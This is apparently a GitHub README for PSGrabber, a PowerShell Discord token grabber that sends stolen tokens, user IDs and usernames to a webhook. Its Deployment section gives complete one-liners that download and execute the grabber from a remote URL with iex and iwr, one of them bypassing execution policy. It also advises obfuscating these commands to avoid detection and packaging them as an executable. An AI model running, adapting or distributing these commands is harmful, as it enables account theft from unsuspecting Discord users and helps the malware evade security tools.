/PSGrabber

A discord token grabber written in powershell

Primary LanguagePowerShell

Logo

PsGrabber

A Discord token grabber that exfiltrates tokens to a webhook written in powershell

Table of Contents
  1. Features
  2. Deployment
  3. Acknowledgements

Features

  • Inbuilt token checker
  • All data sent through a webhook
  • Provives userID of tokens found
  • Provides token type
  • Provides the usernames of the tokens stolen
  • Gives information on where the tokens stolen are stored

Deployment

To effectivly deploy this project, choose one of these steps
To avoid detection, the following commands should be Encoded using Obfuscation

Define HookUrl and use the payload as a powershell script

$hookurl='';iex((iwr https://raw.githubusercontent.com/TheRedBladeClan/PSGrabber/main/PSGrabber.ps1).content)

Convert to batch and then convert into an exe using a third party program

powershell.exe -NoProfile -ExecutionPolicy bypass -Command "$hookurl='';iex((iwr https://raw.githubusercontent.com/TheRedBladeClan/PSGrabber/main/PSGrabber.ps1).content)"

Acknowledgements

  • danielbohannon for The obfuscation used in the program

Authors